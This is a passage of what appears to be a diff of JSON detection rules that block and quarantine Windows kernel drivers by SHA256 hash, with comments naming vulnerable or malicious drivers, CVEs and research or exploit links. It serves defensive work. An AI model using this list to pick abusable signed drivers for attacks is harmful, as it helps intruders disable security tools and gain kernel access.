+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143844Z",
+ "creation_date": "2026-03-23T11:45:31.143846Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143851Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a9aa7d47997abe627a9a13a72c59a8e1eda71bbcf1956bab29e511463e1908d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "674a286c-b967-5fce-af0b-04109eb70da4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490557Z",
+ "creation_date": "2026-03-23T11:45:31.490559Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490565Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "626b55bb5118e8e611ffadf79ad2e7606255c343caf9efc844f1dda6ba2406ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "675a4fbb-d4aa-5fb9-a4d8-69d80cdc4185",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614945Z",
+ "creation_date": "2026-03-23T11:45:29.614947Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614953Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d92eab70bcece4432258c9c9a914483a2267f6ab5ce2630048d3a99e8cb1b482",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "677686fe-cfe5-50e6-a2f6-ede9cfdaea60",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821357Z",
+ "creation_date": "2026-03-23T11:45:30.821360Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821369Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c80dc051c4b0c62b9284211f71e5567c0c0187e466591eacb93e7dc10e4b9ab",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "678a9bf9-e627-56f8-acfc-12341f6676c8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622366Z",
+ "creation_date": "2026-03-23T11:45:29.622368Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622373Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2ba6efeff1860614b150916a77c9278f19d51e459e67a069ccd15f985cbc0e1",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "678f1f81-658d-59a6-b3fe-5b7ba04e6943",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815215Z",
+ "creation_date": "2026-03-23T11:45:31.815217Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815222Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "21e65f2c00631ac77fea052ed981acf655103ca877d7cbab573a79b93fba9d5b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "67949cc7-1a42-5a80-8939-457a73802c3d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975604Z",
+ "creation_date": "2026-03-23T11:45:29.975606Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975611Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da11e9598eef033722b97873d1c046270dd039d0e3ee6cd37911e2dc2eb2608d",
+ "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "679b3e2a-b621-558b-a9dc-87af2ac4bf7a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975290Z",
+ "creation_date": "2026-03-23T11:45:29.975292Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975298Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4cd6dbc00264998beb4f4c09c10e3577b6e0579380856e205a9335b331f4261d",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "679f8097-3389-5a09-9d00-d91c1e620a2d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495169Z",
+ "creation_date": "2026-03-23T11:45:31.495171Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495177Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c02c6e10d05715f21b6fdee9b3ed02a48106a0c39a0a8ae90a0a4740faad0e59",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "67a00de6-d15b-5a3c-9c98-c971571c694c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142575Z",
+ "creation_date": "2026-03-23T11:45:31.142577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142583Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b83e89b7dc79199184516cb3ab12d09d574e02db2bbbf96a2d08ae56087e747",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "67aaecd0-4e70-53a3-baf5-2fbbe962b32a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834815Z",
+ "creation_date": "2026-03-23T11:45:30.834819Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834828Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8d10013155f36d0a9343b8dde6c7851e6bbdabc14f23b56ca66692c8240775ad",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "67acd985-1c04-5d1b-af08-fcac6a0d1de0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484422Z",
+ "creation_date": "2026-03-23T11:45:31.484426Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb0f056c45a8b828e452797415b027030f056820ed12fd693ee20cd92318e19b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "67b1e0e5-c386-5460-a7cf-17f2a5dc4528",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155487Z",
+ "creation_date": "2026-03-23T11:45:31.155489Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155495Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a909f65973d55078973ff6632e2f84fb2378392eadf01b04eb373bed9f8f33f9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "67c1a957-7697-5a68-b50b-92eb7f4f0d4e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605120Z",
+ "creation_date": "2026-03-23T11:45:29.605122Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605127Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bf80a8d047b6dbd239e3e6869b931c31a62de059b24bd76c3564df9125b5aac3",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "67d89456-928c-5071-820d-d708e96f3ce1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967261Z",
+ "creation_date": "2026-03-23T11:45:29.967264Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967273Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "67dc737d-9d23-5aa9-b22f-52f2b414088d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810733Z",
+ "creation_date": "2026-03-23T11:45:31.810735Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810740Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0778ad68d1485165c7295582d49f565912300972b0779bd4a9a1bfb0730448c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "67f2e03b-64c0-553e-a24c-64a3c956439f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977729Z",
+ "creation_date": "2026-03-23T11:45:29.977731Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977737Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cc383ad11e9d06047a1558ed343f389492da3ac2b84b71462aee502a2fa616c8",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "67f41213-84f0-5cf2-a2cf-3db8860720f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621846Z",
+ "creation_date": "2026-03-23T11:45:29.621848Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621853Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "12af7c39519e16307c2c62a84ca40017b43acf7fa90ec97c182701ffcffa1b61",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "67fc1afe-44f9-5c8c-a893-7088b12e29c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621599Z",
+ "creation_date": "2026-03-23T11:45:29.621601Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621606Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "910479467ef17b9591d8d42305e7f6f247ad41c60ec890a1ffbe331f495ed135",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6806dd67-8e9e-5764-b246-0e030241ad7e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480909Z",
+ "creation_date": "2026-03-23T11:45:31.480912Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480922Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0a310c13415346c957240adfd34f0c7cdc893e52b3bdfe6c7dc0f779bef69d5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6814e803-0c08-5842-a4c3-7c0766c99a17",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976660Z",
+ "creation_date": "2026-03-23T11:45:29.976662Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976669Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a30ad675142cf411e7e5f5c53c6423de570a398295b0956130a7a7d77383103",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6836d735-b0ac-58ca-854a-53372572dec7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470042Z",
+ "creation_date": "2026-03-23T11:45:30.470045Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470054Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d67899bbb43fec01b10b33105eb970d44aac5b81dd22cab8bf2d86302f6d08a8",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "68392165-efae-5b5b-a804-d50676a26e74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812616Z",
